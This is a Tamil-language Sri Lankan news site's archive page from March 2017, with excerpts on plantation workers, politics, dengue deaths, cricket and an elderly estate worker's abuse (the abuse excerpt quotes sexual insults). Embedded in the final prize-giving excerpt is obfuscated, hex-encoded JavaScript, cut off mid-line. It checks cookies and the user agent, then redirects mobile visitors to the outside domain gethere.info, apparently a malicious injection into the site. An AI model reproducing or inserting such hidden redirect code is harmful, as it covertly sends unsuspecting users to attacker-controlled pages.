முகப்புஎம்மை பற்றிவிளம்பரம்செய்திகள்தொடர்பு

Day

March 12, 2017

நல்லாட்சியில் பெருந்தோட்ட பெண்களின் வாழ்வில் சுபீட்சம் ஏற்படும் சோ.ஸ்ரீதரன் நம்பிக்கை!

பெருந்தோட்ட பெண்களின் நீண்ட கால எதிர்பார்ப்புக்களை நிறைவேற்றக்கூடிய காலம் தற்போது கனிந்துள்ளதால் இந்தப் பெண்களின் வாழ்வில் விரைவில் சுபீட்சத்தை எதிர்பார்க்கலாம் என்று தொழிலாளர் தேசிய சங்கத்தின் தேசிய அமைப்பாளரும் மத்திய மாகாணசபை உறுப்பினருமான சோ.ஸ்ரீதரன் தெரிவித்தார். தொழிலாளர் தேசிய சங்கத்தின் மகளிர் பிரிவினால் நுவரெலியா திருத்துவ கல்லூரி மண்டபத்தில் ஏற்பாடு செய்யப்பட்டிருந்த மகளிர் தின விழாவில் கலந்து கொண்டு பேசிய போதே இவ்வாறு அவர் தெரிவித்தார். அவர் மேலும் பேசுகையில் கூறியதாவது : பெண்களின் மகத்துவத்தைப் போற்றி...
Read More

மேதினத்துக்காக மலையகம்மீது சு.க. குறி

ஸ்ரீலங்கா சுதந்திரக் கட்சியின் மேதினக் கூட்டத்தை இம்முறை மலையகத்தில் நடத்த வேண்டும் என யோசனை முன்வைக்கப்பட்டுள்ளது. சுதந்திரக் கட்சியின் மத்தியக்குழு கூட்டம் ஜனாதிபதி மைத்திரிபால சிறிசேன தலைமையில் அண்மையில் நடைபெற்றது. இதன்போதே மேற்படி யோசனை முன்வைக்கப்பட்டுள்ளது. இதன்படி, கண்டியில் கூட்டத்தையும் பேரணியையும் நடத்துவதற்குரிய ஏற்பாட்டை செய்யுமாறு ஏற்பாட்டுக்குழுவுக்கு பணிப்புரை விடுக்கப்பட்டுள்ளது. அதேவேளை, உள்ளூராட்சி சபைத் தேர்தலுக்குரிய பிரசாரத்தை கண்டி, மாத்தளை, நுவரெலியா ஆகிய மாவட்டங்களில் விரைவில் சுதந்திரக் கட்சி ஆரம்பிக்கவுள்ளது என மத்திய மாகாண முதலமைச்சர் தெரிவித்துள்ளார்....
Read More

தமிழக மீனவர்களின்றி களையிழந்தது கச்சத்தீவு திருவிழா; இலங்கை கடற்படை கவலை

இந்தியாவில் இருந்து பக்தர்களோ, குருமாரோ வருகை தராதததால், கச்சத்தீவு திருவிழா களையிழந்தது. ஆண்டுதோறும் நடக்கும் கச்சதீவு அந்தோனியார் ஆலய திருவிழாவில் தமிழ்நாட்டில் இருந்தும், இலங்கையில் இருந்தும் ஆயிரக்கணக்கான பக்தர்கள் ஒன்று கூடுவது வழக்கம். இந்த ஆண்டு திருவிழா சனியன்று கொடியேற்றத்துடன் ஆரம்பமாகியது. இன்று கூட்டுத் திருப்பலி மற்றும் திருவுருவ பவனியுடன் விழா நிறைவடைந்தது. கச்சதீவில் புதிய தேவாலயம் கட்டப்பட்ட பின்னர் நடைபெறும் இந்த ஆண்டுக்கான திருவிழாவில் சுமார் 9 ஆயிரம் பக்தர்கள் கலந்து கொள்வர் என்று எதிர்பார்க்கப்பட்டது.எனினும்,...
Read More

கிழக்கை மிரட்டுகிறது டெங்கு; இன்றும் இருவர் பலி

கிழக்கு மாகாணத்தில் டெங்குநோய் ஊழித்தாண்டவமாடுகிறது. நாளாந்தம் பலர் நோயினால் பாதிக்கப்படுகின்றனர். உயிரிழப்புகளும் அதிகரித்துவருகின்றன. இந்நிலையில் திருமலை மாவட்டத்தில் கிண்ணியாவில் டெங்குநோய் காரணமாக இன்று இருவர் உயிரிழந்துள்ளனர். திருகோணமலை பொது வைத்தியசாலையின் தீவிர சிகிச்சைப் பிரிவில் சிகிச்சை பெற்று வந்த கிண்ணியா, 4ஆம் வட்டாரத்தைச் பாத்திமா சனா (06) என்ற சிறுமி மற்றும் கிண்ணியா மாஞ்சோலைச்சேனையைச் சேர்ந்த பாத்திமா றிஸ்வானா (38) என்ற நான்கு பிள்ளைகளின் தாயுமே இவ்வாறு மரணமானவராவார் இவருடன் கிண்ணியாவில் டெங்கு காய்ச்சலினால் 8 பேர்...
Read More

மலையக கூத்து கலைஞர் நடேசன் சாம்பசிவமூர்த்தி காலமானார்!

கூத்து கலைஞர் நடேசன் சாம்பசிவமூர்த்தி அவர்களின் இழப்பு மலையக கலைத்துறைக்கும் நிகர் சமூக கலை இலக்கிய அரங்கத்திற்கும் நிகர் சஞ்சிகைக்கும் பேரிழப்பாகும் என நிகர் சஞசிகையின் பிரதம ஆசிரியரும் நிகர் சமூக கலை இலக்கிய அரங்க பிரதம அமைப்பாளருமான அருணாசலம் லெட்சுமணன் தெரிவித்துள்ளார். அரங்க கலைஞர் அமரர் நடேசன் சாம்பசிவமூர்த்தி அவர்களது மறைவையொட்டி விடுத்துள்ள அறிக்கையிலேயே மேற்படி தெரிவித்துள்ளளார். அவ் அறிக்கையில் மேலும் தெரிவிக்கப்பட்டுள்ளதாவது அமரர் நடேசன் சாம்பசிவமூர்த்தி நிகர் சமூக கலை இலக்கிய அரங்கத்தின் தலைவராக...
Read More

கிரிக்கெட்டில் கலக்கும் கண்டித் தமிழ் இளைஞர்!

கண்டி திருத்துவக் கல்லூரிக்கும், கட்டுகஸ்தோட்டை புனித அந்தோனியர் கல்லூரிக்கும் இடையில் இடம் பெற்ற 100 ஆவது மாபெரும் கிரிகட் போட்டியில் சிறந்த துடுப்பாட்ட வீரராக திருத்துவக் கிரிக்கெட் அணித்லைவர் எஸ்.சன்முகநாதன் தெரிவுசெய்யப்பட்டார். கண்டி திருத்துவக் கல்லூரிக்கும் கட்டுகஸ்தோட்டை புனித அந்தோனியர் கல்லூரிக்கும் இடையில் இடம் பெற்ற 100 ஆவது மாபெரும் கிரிக்கெட் போட்டி கடும் மழை காரணமாக வெற்றி தொல்வி இன்றி முடிடைந்தது. கடந்த வௌ்ளி, சனி தினங்களில் கண்டி பல்லேகலே சர்வதேச கிரிகட் விளையாட்டு மைதானத்தில்...
Read More

வயோதிப மூதாட்டியை “பங்களாவில் அடைத்து வைத்து அசிங்கமாக நடத்திய தோட்ட முகாமையாளர்; பன்விலையில் சம்பவம்!

“ எதற்காக இங்கே வந்தாய்? சாரியை கழட்டடி? இங்கே வா….., வந்து ஆண்குறியைப் பிடி’’ வயிற்றுப்பிழைப்புக்காக கராம்பு பொறுக்கச்சென்ற 74 வயதுடைய மூதாட்டியை பங்களாவுக்குள் சிறைவைத்து- இப்படி அசிங்கமான வார்த்தைகளைப் பிரயோகித்து கொடுமைப்படுத்தியுள்ளார் சிங்கள தோட்ட முகாமையாளர் ஒருவர். கண்டி, பன்வில பொலிஸ் பிரிவுக்குட்பட்ட தோட்டமொன்றில் முகாமையாளராக பணியாற்றும் சிங்கள அதிகாரியொருவர்,தோட்டத் தொழிலாளர்களை அடிகைகளாகக் கருதி பலவழிகளிலும் தொல்லைகள் கொடுத்துவருகிறார். இவர் பெரும்பான்மையினத்தை சேர்ந்தவர் என்பதால் பொலிஸ் நிலையத்திலும் தனி கவனிப்பு- சிறப்புரிமைகள் வழங்கப்படுகின்றன. இதனால், இவருக்கு...
Read More

750 தொழிலாளர்களின் ரூ. 24 மில்லியன் ஈ.பி.எவ். நிதி தேக்கம்; மத்திய வங்கி அசமந்தம்; டிக்கோயா மக்கள் பெரும் அவலம்!

டிக்கோயா டங்கல்ட் தனியார் தோட்டத்தைச் சேர்ந்த சுமார் 750 தொழிலாளர்களின் ஊழியர் சேமலாப நிதி 24 மில்லியன் ரூபாவை கொழும்பு மத்திய வங்க தேக்கி வைத்துள்ளது. தகவல் தற்போது வெளியில் கசிந்துள்ளதையடுத்து, அத்தொகையை தொழிலாளர்களின் வங்கிக் கணக்கில் வைப்பிலிடுமாறு பொறுப்பான மத்திய வங்கியின் ஈ.பி.எவ். நிதிக்கு பொறுப்பான மேலதிகாரியிடம் இலங்கைத் தொழிலாளர் காங்கிரஸின் பொதுச்செயலாளரான ஆறுமுகன் தொண்டமான எம்.பி. கோரிக்கை விடுத்துள்ளார். இது குறித்து ஆறுமுகன் தொண்டமான பல தடவைகள் குறித்த தனியார் உரிமையாளரிடம் தொடர்பு கொண்டு...
Read More

புத்திரசிகாமணியின் நியமனம் சட்டவிரோதமானது; இ.தொ.கா. அதிருப்தி

பெருந்தோட்ட மனிதவள அபிவிருத்தி நிதியத்தின் பணிப்பாளர் நாயகம் ஓய்வுபெற்றதையடுத்து, பணிப்பாளர் சபையின் அங்கீகாரமின்றி அவரது வெற்றிடத்துக்கு பிறிதொருவர் நியமிக்கப்பட்டுள்ளார். ஜனநாயக மரபுகளையும் மீற தன்னிச்சையாக மேற்கொண்ட இந்நியமனம் தொடர்பில் இலங்கைத் தொழிலாளர் காங்கிரஸின் உப தலைவரும், சர்வதேச விவகாரங்களுக்கு பொறுப்பாளருமான எஸ் அருள்சாமி தமது அதிருப்தியை வெளியிட்டுள்ளார். “ மேற்படி நம்பிக்கை நிதியத்துக்கு சில பாரம்பரியங்கள் இருக்கின்றன. எவரை நியமிக்க வேண்டும் அல்லது எவரை நீக்க வேண்டும் என்பதை பணிப்பாளர் சபையே தீர்மானிக்கும். அந்த கடமையும், பொறுப்பும்...
Read More

பரிசளிப்பு நிகழ்வு

தொலஸ்பாகே, பரணகல தமிழ் வித்தியாலயத்தில் இடம்பெற்ற வருடாந்த இல்ல விளையாட்டுப்போட்டியில் தமிழ் முற்போக்கு கூட்டணியின் கண்டி மாவட்ட நாடாளுமன்ற உறுப்பினர் கௌரவ வேலுகுமார் ,பிரதம விருந்திருந்தினராக கலந்ததுகொண்டார். வெற்றிபெற்ற அகிக்கு வெற்றிக் கிண்ணத்தையும் வழங்கி வைத்தார். var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+...
Read More
error: Content is protected !!